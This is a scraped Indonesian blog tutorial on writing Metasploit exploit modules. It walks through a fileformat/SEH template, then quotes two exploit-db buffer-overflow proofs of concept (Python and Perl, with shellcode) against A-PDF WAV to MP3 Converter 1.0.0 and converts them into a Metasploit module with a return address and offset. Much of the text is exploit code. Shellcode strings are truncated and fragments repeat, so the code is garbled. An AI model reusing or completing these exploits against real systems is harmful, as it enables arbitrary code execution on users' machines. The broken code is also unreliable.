##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Exploit Title',
'Description' => %q{
Exploit Description
},
'License' => MSF_LICENSE,
'Author' =>
[
'Author'
],
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.somesite.com/ ],
],
'Payload' =>
{
'Space' => 6000,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => } ],
],
'Privileged' => false,
'DisclosureDate' => 'Date',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'filename.ext']),
], self.class)
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end
Jadi dalam menulis exploit sebenarnya mengacu pada acuan baku seperti diatas :
1. class Metasploit3 < Msf::Exploit::Remote
2. def initialize
3. def exploit
...
perhatikan ketiganya itu....
jadi apabila kita akan menulis exploit harus menggunakan ketiga metode ini,
perhatikan baik baik dan hafalkan.
Nanti saya akan mencontohkan bagaimana cara merubah structur tersebut menjadi sebuah exploit.
saya akan jelaskan satu persatu :
yang pertama coba perhatikan cara penulisan class diatas :
class Metasploit3 < Msf::Exploit::Remote
...
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
Itu adalah kata kata baku ......
lihat Seh ini adalah kata untuk kalimat remote.....
jadi apabila kita akan membuat exploit untuk meremote jarak jauh ingat selalu copy paste kata kata itu,
def initialize(info = {})
...
super(update_info(info,
'Name' => 'Exploit Title',
'Description' => %q{
Exploit Description
},
'License' => MSF_LICENSE,
'Author' =>
[
'Author'
],
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.somesite.com/ ],
],
'Payload' =>
{
'Space' => 6000,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => } ],
],
'Privileged' => false,
'DisclosureDate' => 'Date',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'filename.ext']),
], self.class)
end
def exploit
...
print_status("Creating '#{datastore['FILENAME']}'
file_create(sploit)
end
kita coba buat dengan menggunakan exploit disini :
http://www.exploit-db.com/
kita cuba buat exploit ini menjadi metasploit framework.
##########################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
...# Exloit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com
# Reference: http://www.exploit-db.com/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
##########################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
code = (
"\x89\xe1\xd9\xee\xd9\x71\
"\x43\x43\x43\x43\x43\x43\
"\x58\x34\x41\x50\x30\x41\
"\x42\x41\x41\x42\x54\x41\
"\x30\x42\x42\x58\x50\x38\
"\x48\x47\x34\x43\x30\x45\
"\x4c\x4c\x4b\x43\x4c\x45\
"\x4b\x50\x4f\x45\x48\x4c\
"\x4b\x51\x59\x4c\x4b\x50\
"\x51\x49\x50\x4c\x59\x4e\
"\x57\x49\x51\x49\x5a\x44\
"\x34\x47\x4b\x50\x54\x47\
"\x4b\x51\x4f\x47\x54\x45\
"\x4c\x50\x4b\x4c\x4b\x51\
"\x4b\x45\x4c\x4c\x4b\x45\
"\x44\x44\x44\x48\x43\x51\
"\x56\x42\x44\x4c\x4b\x51\
"\x4c\x4c\x4b\x44\x30\x45\
"\x58\x4b\x39\x4a\x58\x4d\
"\x58\x4a\x50\x4d\x5a\x44\
"\x4e\x4c\x4a\x44\x4e\x50\
"\x51\x42\x4c\x42\x43\x43\
buff = ("\x41" * 4132);
nops = ("\x90" * 12);
nseh = ("\xEB\x06\x90\x90");
retn = ("\x5C\x26\x47\x00");
junk = ("\x42" * 300);
sploit = (buff+ nseh + retn + nops + code + junk);
try:
f1 = open("Dr_IDEs.wav","w"); #No file checking, any file extension works... (.xyz .foo .abc)
f1.write(sploit);
f1.close();
print ('[*] Success. Load File.');
except:
print ("[-] Error, could not write the file.");
namanya juga latihan........
jadi kita punya 2 aturan :
...1. Structure Metasploit yang paling atas yang bisa kita rubah2
2. Bug Remote Exploit.
Nanti kita coba buat sebuah exploit untuk bug diatas,
sekarang kita buka bug aslinya yang ada di web ini :
http://www.exploit-db.com/
jadi ada 2 bug di aplikasi itu.....
kita mengacu ke bug2 milik http://www.exploit-db.com/
# Exploit Title: A-PDF WAV to MP3 Converter 1.0.0 (.m3u) Stack Buffer Overflow
# Author: d4rk-h4ck3r
# Date: 2010-07-17
# Software Link: http://www.brothersoft.com
# Greetz 2 : PASSEWORD , KAiSER-J , sec4...ever , tli7a , All Tun!Sian h4ck3rz
# Spacial thanks 2 : MadjiX ( el m3alem )
# Tested on: Windows XP SP3 Fr
my $jnk="\x41" x 4128 ;
my $eip = "\x63\x46\x92\x7C" ; # 0x7C924663 call esp kernel 32
my $nop = "\x90" x 20;
$shellcode = $shellcode
."\xdb\xc0\x31\xc9\xbf\x7c
"\x1e\x58\x31\x78\x18\x83\
"\x78\xbc\x65\xc9\x78\xb6\
"\x3a\x32\x1c\xbf\x62\xed\
"\x60\xf5\x71\xca\x06\x35\
"\xf0\x27\xdd\x48\xfd\x22\
"\xcf\x4c\x4f\x23\xd3\x53\
"\x1f\x57\x53\x64\x51\xa1\
"\xf5\xaa\xf1\x05\xa8\x26\
"\xb6\x0e\x2f\x85\x19\x87\
"\x7f\xe8\x7b\xca";
open(MYFILE,'>>d4rk.m3u');
print MYFILE $jnk.$eip.$nop.$shellcode;
close(MYFILE);
Dari Uraian diatas kita sudah punya 2 kunci :
1. Carilah Bugnya dan kita mendapatkan acuan bug di :
...
http://www.exploit-db.com/
http://www.exploit-db.com/
2. Kita sudah punya struktur cara menulis diatas,
Hanya itu dalam menulis exploit,
yuk kita praktekkan................
1. def initialize(info = {})
2. super(update_info(info,
3. 'Name' => 'A-PDF WAV to MP3 v1.0.0 Buffer Overflow',
...4. 'Description' => %q{
Kita dapat mengetikkan keterangan jenis exploit disini
},
5. 'License' => MSF_LICENSE,
6. 'Author' =>
[
'd4rk-h4ck3r', # Nama Penemu Exploit ini pertama
'Dr_IDE', # SEH Exploit (yang menggunakan SEH)
'dookie' # MSF Module
],
7. 'Version' => '$Revision: $',
8. 'References' =>
[
[ 'URL', 'http://www.exploit-db.com/
[ 'URL', 'http://www.exploit-db.com/
],
Sampai disini mudah bukan membuat header exploit....
Tinggal memindahkan Name, Description, License, Author, Version, dan Referece.... semua tinggal kita contek dari bug.......
{
...
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true'
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x0047265c, 'Offset' => 4132 } ], # p/p/r in wavtomp3.exe
],
'Privileged' => false,
'DisclosureDate' => 'Aug 17 2010',
'DefaultTarget' => 0))
kemudian kita deklarasikan
[
...
OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
], self.class)
def exploit
...sploit = rand_text_alpha_upper(targ
sploit << generate_seh_record(target
sploit << make_nops(12)
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}'
file_create(sploit)
end
»
Hack
,
Programing
» Sebelum melanjutkan belajar menulis exploit sendiri. Kita pelajari struktur2 coding exploit !!!
Sebelum melanjutkan belajar menulis exploit sendiri. Kita pelajari struktur2 coding exploit !!!
Tinggal mengganti tulisan2 note berikut ini :
#!/usr/bin/env python ########################## ########################## ### /a-pdf-wav-to-mp3-converte r-394393.html exploits/14676/ ########################## ########################## ### xf4\x58\x50\x59\x49\x49\x4 9\x49" x51\x5a\x56\x54\x58\x33\x3 0\x56" x33\x48\x48\x30\x41\x30\x3 0\x41" x41\x51\x32\x41\x42\x32\x4 2\x42" x41\x43\x4a\x4a\x49\x4b\x4 c\x4a" x50\x45\x50\x4c\x4b\x51\x5 5\x47" x55\x42\x58\x45\x51\x4a\x4 f\x4c" x4b\x51\x4f\x51\x30\x43\x3 1\x4a" x34\x4c\x4b\x43\x31\x4a\x4 e\x46" x4c\x4d\x54\x49\x50\x42\x5 4\x45" x4d\x43\x31\x48\x42\x4a\x4 b\x4c" x54\x45\x54\x43\x45\x4b\x5 5\x4c" x51\x4a\x4b\x45\x36\x4c\x4 b\x44" x4f\x45\x4c\x43\x31\x4a\x4 b\x4c" x51\x4a\x4b\x4c\x49\x51\x4 c\x46" x4f\x50\x31\x4a\x56\x45\x3 0\x50" x56\x50\x30\x4c\x4b\x51\x5 0\x44" x4c\x4e\x4d\x4c\x4b\x43\x5 8\x45" x53\x49\x50\x42\x4a\x50\x5 0\x43" x44\x51\x4f\x45\x38\x4a\x3 8\x4b" x57\x4b\x4f\x4d\x37\x42\x4 3\x43" x30\x41\x41");
Ingat ............... exploits/14676/ exploits/14681/ .
Kita edit struktur acuan kita : exploits/14676/' ], exploits/14681/' ],
'DefaultOptions' =>
register_options(
Silahkan Tulis Komentar Anda ...